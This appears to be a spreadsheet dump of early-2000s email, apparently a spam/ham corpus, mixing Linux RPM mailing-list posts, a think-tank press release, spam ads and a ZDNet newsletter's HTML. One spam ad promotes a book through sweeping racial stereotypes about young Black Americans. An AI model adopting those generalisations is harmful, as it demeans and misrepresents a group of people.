 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.00 0.05 0.01
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: GOVERNMENT REGULATION IS KILLING THE STOCK MARKET
</t>
  </si>
  <si>
    <t xml:space="preserve">PRESS RELEASE FROM THE AYN RAND INSTITUTE
 2121 Alton Parkway, Suite 250
 Irvine CA 92606
 July 24, 2002
 FOR IMMEDIATE RELEASE
 GOVERNMENT REGULATION IS KILLING THE STOCK MARKET
        IRVINE, CA -- The steep decline in the stock market is being fueled
 by investors' realization that increasing government constraints on
 corporate America will harm business and the economy--not help them, said
 Yaron Brook, executive director of the Ayn Rand Institute.
        "Instead of launching a witch-hunt against CEOs and rushing to give
 the government wider powers over business, we should get rid of the complex
 and contradictory regulations that encourage bad accounting and prevent
 shareholders from acting in their own interest."
        "The common explanation that 'greed' is to blame makes no sense--the
 abuses in companies like Enron and WorldCom were not exercises in
 self-interest, but in self-destruction.
        "In an unfettered free market the desire for profit is satisfied by
 honest, long-range, rational behavior: by innovating, by hiring the best
 employees, by selling quality products and by providing accurate information
 to the owners of the corporation--the shareholders. As for short-range
 managers, the markets will not tolerate them. As for the real swindlers,
 existing laws against force and fraud are sufficient to protect us."
        "If our politicians are indeed concerned about the stock market,"
 said Dr. Brook, "let them demonstrate it by eliminating, not adding,
 regulations and making the market truly free."
 ###   ###   ###
 Ayn Rand Institute executive director Dr. Yaron Brook is available for
 interviews on this topic.
 Contact: Larry Benson
 E-mail: larryb@aynrand.org
 Phone: (949) 222-6550 ext. 213
 Read Dr. Brook's full Op-Ed at:
 http://www.aynrand.org/medialink/killingthestockmarket.shtml
 For more information on ARI's unique point of view go to Medialink at the
 Institute's Web site at www.aynrand.org. Founded in 1985, the Ayn Rand
 Institute promotes the philosophy of Ayn Rand, author of Atlas Shrugged and
 The Fountainhead.
 If you wish to have your email gazette@vineyard.net REMOVED from this list,
 please send an email to davidh@aynrand.org with the email address to be
 removed. Thank you.
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, QuaffA wrote :
 &gt; I've tried the --without options, but still end up with (similar for the
 &gt; regular package),
 &gt; 
 &gt; 	glut is needed by xine-libs-0.9.13-fr5
 You need to install the "glut" package from Red Hat Linux 8.0 (and
 "glut-devel" if you intend to recompile the source rpm).
 &gt;         aalib is needed by xine-libs-0.9.13-fr5
 &gt;         lirc is needed by xine-libs-0.9.13-fr5
 &gt;         libaa.so.1 is needed by xine-libs-0.9.13-fr5
 &gt;         libglut.so.3 is needed by xine-libs-0.9.13-fr5
 Here you need both "aalib" and "lirc" from freshrpms.net. They're small,
 they can be quite useful, that's why I've compiled xine with them as a
 default.
 You should be able to get rid of those two though, by rebuilding the source
 rpm (otherwise it's a bug in my packaging!) :
 rpmbuild --rebuild --without aalib --without lirc xine*.src.rpm
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 Load : 0.06 0.13 0.09, AC on-line, battery charging: 100% (1:47)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Dawn raids stoke fires of resentment
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655713,215/
 Date: 2002-10-08T03:30:53+01:00
 *Afghanistan: *In his final report one year from the beginning of the US 
 campaign *Rory McCarthy* finds mounting anger at the military presence.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --------------080808010909060409040405
 Content-Type: text/plain; charset=us-ascii; format=flowed
 Content-Transfer-Encoding: 7bit
 Bill Stoddard wrote:
 &gt;&gt;No one likes commercial spam. 
 &gt;&gt;    
 &gt;&gt;
 &gt;And no one like unsolicited political spam. End of story.
 &gt;
 &gt;Bill 
 &gt;http://xent.com/mailman/listinfo/fork
 &gt;  
 &gt;
 Except perhaps for the people in charge.
 Owen
 http://zdnet.com.com/2100-1105-954903.html
 *Political spam on your cell phone?*
 By Lisa M. Bowman &lt;mailto:lisa.bowman@cnet.com&gt;
 Special to ZDNet News
 August 22, 2002, 12:05 PM PT
 URL: http://zdnet.com.com/2100-1105-954909.html 
 &lt;%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20http://zdnet.com.com/2100-1105-954909.html%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20&gt; 
 *In a decision that treats text messaging on mobile phones essentially 
 the same as bumper stickers, the Federal Election Commission has 
 declared that senders of text-based political ads don't have to disclose 
 who funded them.*
 In an advisory opinion issued Thursday, the FEC also suggested such 
 messages include either a phone number or Web site link, so people could 
 easily learn who paid for the message. However, the additional 
 information won't be required.
 The opinion could encourage the adoption of text-based political ads, as 
 campaign experts look for new technological ways to sway voters. At the 
 same time, opponents of the plan fear it could lead to anonymous 
 political spam.
 Target Wireless, a small New Jersey-based wireless media company, had 
 asked the FEC for an opinion on the matter, saying that requiring 
 financial disclosures on short messaging service (SMS) mailings would 
 use up too much of the 160 character-maximum.
 Political messages on bumper stickers and buttons are also exempt from 
 the financial disclosure requirement. Target Wireless' petition was 
 supported by the National Republican Senatorial Committee, the Cellular 
 Telecommunications and Internet Association, and some advertising trade 
 groups.
 FEC spokesman Bob Biersack said the opinion was in keeping with the 
 commission's policy not to meddle with new technology that has the 
 potential to reach more voters.
 "We have tried very hard not to get in the way--particularly before 
 everyone understands how the technology is going to work," he said.
 Opponents of the plan have worried the exemption might encourage spam or 
 allow senders to blast people with mass amounts of negative political 
 messages while remaining anonymous.
 Biersack said the FEC can revisit the issue if those problems surface.
 Target Wireless President Craig Krueger characterized the opinion as 
 "good for America."
 "It will allow people to receive more communication from those running 
 for office," he said. "We have free speech on our side."
 --------------080808010909060409040405--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 04 Oct 2002 01:14:28 +0200
 Vincent &lt;cult@free.fr&gt; wrote:
 # Hello,
 # 
 # I'm looking for the package k3b for the redhat 8.0, Does anyone know
 # 
 # where to get it ? I tried to compile but it did an error message:
 I've been working on a .src.rpm for it.  Their rpm and spec file is
 very dirty, so I"m cleaning it up.  I think I have all the build-req's
 and the install req's sorted out, but I need more testers.
 http://geek.j2solutions.net/rpms/k3b/
 Please try it.
 -- 
 Jesse Keating
 j2Solutions.net
 Mondo DevTeam (www.mondorescue.org)
 Was I helpful?  Let others know:
  http://svcs.affero.net/rm.php?r=jkeating
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] replacement xircom dongle?
</t>
  </si>
  <si>
    <t xml:space="preserve">Anyone know where in Ireland I can get a replacement external dongle
 for a Xircom CE3B-100 PCMCIA NIC?
 Failing that, who delivers fastest to Ireland?
 Regards,
 Vin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Special Affiliate Offers from Amazon.Com!
</t>
  </si>
  <si>
    <t xml:space="preserve"> 
                   Welcome to "Ghetto" America!
 ...Yes, you heard me; I said "Ghetto" America! What is "Ghetto" 
 America, I'm glad you asked. Before I go on please be warned, 
 this explanation may not sit well with many of you, however it is 
 no less true! "Ghetto" America is a society of individuals 
 comprised primarily of African Americans who represent the 
 impoverished, and often unpolished side of "Black America;" 
 Confused?! I shall explain further; have you ever passed by a 
 typical ghetto community; namely the "projects" and noticed an 
 unusual amount of fancy cars parked throughout that particular 
 neighborhood, and wondered how could that be? Or maybe you have 
 been to a shopping mall, and noticed an unusual amount of young 
 "teen looking" black women carrying infants, or pushing baby 
 carriages and often with a toddler in tow! Perhaps you also 
 noticed that there was rarely any male companion accompanying 
 them. If you paid close attention you might have also noticed the 
 absence of the all important "wedding band" missing from their 
 respective ring fingers!" .And of course we have all heard 
 stories of young black men carrying guns, and knives, allegedly 
 mugging, robbing and carjacking people of all sorts! Did you know 
 that many young African American women refuse to date African 
 American males if they do not own or possess an automobile. In 
 fact many young Black women prefer only to date individuals who 
 represent the subversive side of society; commonly known as 
 "Thugs" or "Street Hustlers;" Also, did you know that many young 
 African American males prefer to buy expensive luxury cars while 
 living in government housing better known as the "projects" 
 rather than move away, purchase new homes, save, or even make 
 investments?
     "Attention" This is Not another "Boyz in the Hood" Story!
 These newly distinguished "Black Generation Xers" are suffering 
 through utter chaos. "Baby Makers, Loser choosers, Welfare 
 Abusers...Images of My America" is a collection of observations, 
 and commentary as told through the eyes of a young African 
 American Male who experienced, and perpetuated many of the truths 
 that many in "Black America," and the world in general would have 
 you believe do not exist. It is a riveting expose that sheds 
 light on the oppressive, and often discriminatory nature of 
 "Mainstream American Society." A society that has nurtured the 
 rampant disregards for self-respect, and enlightenment that many 
 young African American men, and women currently suffer from. The 
 writer supports his arguments with direct references to the 
 overwhelming numbers of young black single mothers attempting to 
 raise children, with many being teens themselves; and the foolish 
 criteria that is utilized when choosing their mates; oftentimes 
 being based on nothing more than the young black male's tough or 
 cool neighborhood reputation.
 The author also identifies the self-destructive and often 
 criminal behavior that many young black men perpetuate on a daily 
 basis like, refusing to pursue higher education, carrying guns, 
 robbing, stealing, selling drugs, driving fancy cars, and wearing 
 expensive jewelry. The negative and self-debasing behavior 
 committed by both males, and females is due in large part to a 
 lack of guidance resulting from having been reared in fatherless 
 homes. These poor choices, and behavioral disorders coupled with 
 the unnecessary burden that it places on tax paying citizens in 
 the form of welfare abuse, and over crowded prison populations 
 are the center causes for the cycle of rampant poverty, and lack 
 of direction that currently exists in young "Black America" 
 today. To learn more about this dynamic self contained society 
 visit www.BlackRealityPublishing.com and reserve your copy today! 
               To request an excerpt please email                  
                Books@BlackRealityPublishing.com 
             Buy this soon to be "Best Seller" now!
                 www.BlackRealityPublishing.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Oh ma gawd - funny site of the day...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Ahhhh Dave Winer..Seems like only yesterday fork was knee deep in
 winerrants..hes gone away though...so sad (insert real honest to goshness
 tears)
 But the past  live on...in the archives...
 Remeber when Dave was being betrayed by O'Reilly?
 http://www.xent.com/aug00/0725.html
 On "closed source" justifications
 http://www.xent.com/FoRK-archive/sept00/0346.html
 Daves trys to grok fork
 http://www.xent.com/FoRK-archive/sept00/0953.html
 NT runs just as good as linux...really
 http://www.xent.com/aug00/0069.html
 There are a few months of this stuff (just google or forkcrawl the
 archives) then he got truly fedup with all our  not polite unfresh
 thinking and went silent, for the most part.
 oh well, back to life.
 -tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Search Engine Placement
</t>
  </si>
  <si>
    <t xml:space="preserve">To remove see below.
 I work with a company that submits
 web sites to search engines and saw
 your listing on the internet.
 We can submit your site twice a month
 to over 400 search engines and directories
 for only $29.95 per month.
 We periodically mail you progress
 reports showing where you are ranked.
 To get your web site in the fast lane
 call our toll free number below!
 Sincerely,
 Brian Waters
 888-892-7537
 * All work is verified
 To be removed call: 888-800-6339 X1377
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Enlargement Breakthrough                       ZIBDRZPAY
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MS's Palladium: What the hell is it? (Here's what!) [ANCHORDESK]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</si>
  <si>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=3D60-oqItIsEAuUWbnYDLN8S_eSgFWVRR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
         &lt;img src=3D"http://www.zdnet.com/techupdate/i/gl_ad2.gif" width=3D"=
 160" height=3D"16" border=3D"0"  alt=3D"Advertisement"&gt;&lt;br&gt;
         &lt;!--tower --&gt;
       &lt;iframe src=3D"http://www.zdnet.com/include/ads/ifc/RGROUP=3D2766" sc=
 rolling=3D"no" frameborder=3D"0" hspace=3D"0" vspace=3D"0" height=3D"600" w=
 idth=3D"160" marginheight=3D"0" marginwidth=3D"0"&gt;
 &lt;script language=3D"JavaScript" src=3D"http://www.zdnet.com/include/ads/js/=
 RGROUP=3D2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;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href=3D"http://clickthru.online.com/Click?q=3D75-whwtIKU=
 AIZStr2o_rjups7LLZ5ZR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img s=
 rc=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6"&gt;&lt;br=
 &gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D8a-3y3dQXn=
 da3GlnEKO3Nt-tKChBwnR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out these personal laser printer picks at ZDNet Reviews.&lt;/b&gt;&lt;/font&gt;&lt;/=
 a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" hei=
 ght=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Da0-11h8QQB=
 qXH3ywDPUByjw2PB1s7iR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 See how WAP works and how you should use it at Builder.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;=
 br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=
 =3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Db5-50FcQ7U=
 7vHdEUfZ1PHq15ZNEEZPR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a new job? Find one today in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;=
  &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D=
 "6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dca-iciuQUg=
 FRLJ8DTfcl8jfOfRHHUnR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 CIOs talk out about the future of IT at CNET News.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;=
 img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6=
 "&gt;&lt;br&gt;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&gt;WED JUL 10,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ck?q=3Ddf-1kJhQLEFHEQTE9HfbQq-Kh1XhaeR" &gt;&lt;b&gt;MS's Palladium: What the hell i=
 s it? (Here's what!)&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/gra=
 phics/clear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 Everybody's talking about Palladium, Microsoft's new "trust=
 worthy computing" architecture. But the details on what it is and how it wi=
 ll work are still extremely sketchy. Here's what I've been able to piece to=
 gether so far.&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Df4-Y-XEQ0s=
 kGxV4lK8uUJ5QddfWmTyR" &gt;&lt;b&gt;NOTE: Why we're changing our publishing schedule=
 &lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D09-joDSIj8=
 8wYlmYsALYSS7ZMgtY8lR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: Kicked out of Macworld&lt;/=
 b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b=
 .gif"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href=3D"http://clickthru.online.com/Click?q=3D1e-JQuLI4jWHdqQRtd=
 qEsB8LE27qd4R" &gt;WiFi nets: Stop sharing!... iPod for Linux... Super-sized n=
 otebooks &lt;/a&gt;&lt;p&gt;
          =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D34-pJpSIcd819ba8hq=
 3_tvVyn4IcgyR" &gt;Why cyberterrorists don't care about your PC&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D49-ZM4cIEpSenW2Kzj=
 VX4RVXFO5JSFR" &gt;Guilty pleasures: 3 top politically incorrect games&lt;/a&gt;&lt;p&gt;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cellspacing=
 =3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt;   &lt;tr bgcolor=3D"#999999"&gt;&lt;td cols=
 pan=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ffff=
 ff" size=3D"-2"&gt;&lt;b&gt;Crucial Clicks: More from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;   &lt;=
 tr&gt;   &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;   &lt;td row=
 span=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b=
 .gif" height=3D1 width=3D5&gt;&lt;/td&gt;   &lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www=
 .zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;&lt;/td&gt; =
   &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;   &lt;td bgcolor=3D"#999999" rowspan=
 =3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif=
 " height=3D1 width=3D1&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr valign=3D"top"&gt;   &lt;td width=3D"1=
 00%"&gt;          &lt;table width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" b=
 order=3D"0"&gt;        &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;font face=3D"verdana, geneva" co=
 lor=3D"#333333" size=3D"-2"&gt;&lt;b&gt;PDAS&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src=3D"http://www.=
 zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;=
 /td&gt;&lt;/tr&gt;        &lt;tr valign=3D"top"&gt;       &lt;td width=3D"85"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D5e-ssGdIn06tVsPzPPhsnStcVTQzc9R" &gt;&lt;img sr=
 c=3D"http://www.zdnet.com/products/graphics/060502_Palmapps.jpg" width=3D"8=
 5" height=3D"110" border=3D"0" alt=3D"" /&gt;&lt;/a&gt;&lt;/td&gt;           &lt;td width=3D"=
 5"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" he=
 ight=3D1 width=3D5&gt;&lt;/td&gt;        &lt;td width=3D"100%"&gt;&lt;font face=3D"arial, hel=
 vetica" size=3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D73-__Z=
 eIBBtWIc2v4DT8UEE0WNrUZcR" style=3D"text-decoration:none"&gt;&lt;b&gt;An industry fi=
 rst&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;ZDNet reviewers take a look at Toshiba's e740, the first P=
 DA with Intel's new XScale processor and integrated WiFi connectivity.&lt;/fon=
 t&gt;&lt;/td&gt;         &lt;/tr&gt;           &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://ww=
 w.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /=
 &gt;&lt;img src=3D"http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width=
 =3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;font face=3D"arial, helvetica=
 " size=3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D88-ec5PQQKx6=
 IoO4h7-rU358atSBbiR" style=3D"text-decoration:none"&gt;Read our Full Review&lt;/a=
 &gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;           &lt;/table&gt;   &lt;/td&gt;   &lt;td&gt;&lt;img src=3D"http://www.=
 zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;  =
  &lt;td width=3D"180"&gt;    &lt;table cellpadding=3D"0" cellspacing=3D"0" width=3D"=
 180" border=3D"0" bgcolor=3D"#eeeeee"&gt;        &lt;tr bgcolor=3D"#999999"&gt;&lt;td c=
 olspan=3D"3" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#f=
 fffff" size=3D"-2"&gt;yMost Popular Products&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;          &lt;tr&gt;   =
  &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" =
 width=3D"10" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;td&gt;&lt;font f=
 ace=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/=
 graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"5" alt=3D"" bord=
 er=3D"0" /&gt;&lt;br /&gt;    &lt;b&gt;Handhelds&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com=
 /graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"7" alt=3D"" bor=
 der=3D"0" /&gt;&lt;br /&gt;       &lt;b&gt;1&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/C=
 lick?q=3D9d-kkCWQv0umMiWedyuKLvd75wKZzPR" style=3D"text-decoration:none"&gt;To=
 shiba Pocket PC e310&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anc=
 hordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;=
 br /&gt;       &lt;b&gt;2&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3Db2-M=
 4pwQX0a3ZUOM5SjM2cmpxUCPunR" style=3D"text-decoration:none"&gt;Toshiba Pocket =
 PC e740&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/front=
 page/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;      &lt;b=
 &gt;3&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc7-KG43QLPWxedmZi1=
 NWtUoF24wxeeR" style=3D"text-decoration:none"&gt;Palm m515&lt;/a&gt;&lt;br /&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" h=
 eight=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;b&gt;4&lt;/b&gt;. &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3Ddc-40zzQ0Lr5OUv8T7Bz6gEwTinhlyR" style=3D"tex=
 t-decoration:none"&gt;Palm Vx&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphi=
 cs/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=3D"=
 0" /&gt;&lt;br /&gt;      &lt;b&gt;5&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3Df1-MtTuQpsFEcOnoIWH3XX8owMnerlR" style=3D"text-decoration:none"&gt;Compaq i=
 Paq H3835&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fro=
 ntpage/b.gif" width=3D"1" height=3D"6" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;i=
 mg src=3D"http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width=3D=
 "8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=3D"http://clickthru.on=
 line.com/Click?q=3D07-HqCzI5rq9Ttex1IiqzUbrvLkiDeR" style=3D"text-decoratio=
 n:none"&gt;More popular PDAs&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;    &lt;img src=3D"http://www.zdnet.com=
 /graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"10" alt=3D"" bo=
 rder=3D"0" /&gt;&lt;br /&gt;    &lt;/font&gt;&lt;/td&gt;    &lt;td&gt;&lt;img src=3D"http://www.zdnet.com=
 /graphics/anchordesk/frontpage/b.gif" width=3D"10" height=3D"1" alt=3D"" bo=
 rder=3D"0" /&gt;&lt;/td&gt;         &lt;/tr&gt;           &lt;/table&gt;   &lt;/td&gt;   &lt;/tr&gt;   &lt;tr v=
 align=3D"top"&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/a=
 nchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;   &lt;tr&gt;&lt;td colspa=
 n=3D"7" bgcolor=3D"#999999"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/ancho=
 rdesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;   &lt;/table&gt;   &lt;!-- /#=
 ## --&gt; &lt;table cellpadding=3D10 border=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D1c-cs_iIFr43m3vweqn9kgGa2oXqGyR"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://clickthru.online.com/Click?q=3D31-V_YRIjMsD070C6syLxjkqVAXXblR" &gt;&lt;b&gt;WiFi=
  nets: Stop sharing!... iPod for Linux... Super-sized notebooks&lt;/b&gt;&lt;/a&gt;&lt;br&gt;=
 Cable companies are demanding that customers stop sharing their high-speed =
 Net access over wireless networks. Plus: Linux users may soon be able to ac=
 cess Apple's iPod. And Toshiba unveils a fashionably large notebook. &lt;/font=
 &gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;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e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;ROBERT VAMOSI&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/231.gif" alt=3D"ROBERT VAMOSI" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D46-19zwInp=
 DSNbqQdfa1cN0535V0Y9R" &gt;&lt;b&gt;Why cyberterrorists don't care about your PC&lt;/b&gt;=
 &lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" =
 width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Forget about viruses. America's real cybersecurity concerns=
  are the notoriously vulnerable computer systems that control our power and=
  water supplies. But Robert has a few ideas about how to keep the infrastru=
 cture safe.&lt;/font&gt;&lt;/td&gt;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href=3D"http://clickthru.online.com/Click?q=3D5b-5LOwIBK=
 DUXll6LHxCjjvDSwizzcR" &gt;&lt;b&gt;Guilty pleasures: 3 top politically incorrect ga=
 mes&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clea=
 r.gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Sometimes you just want to kick back and drive drunk, commi=
 t a few crimes, or blast some innocent critters to smithereens. Preston's g=
 ot three raucous downloads that let you do all that and more--from the safe=
 ty of your PC.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D71-GwdUIEZcfHsVIdLqwuBXvl3=
 NU2FR" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
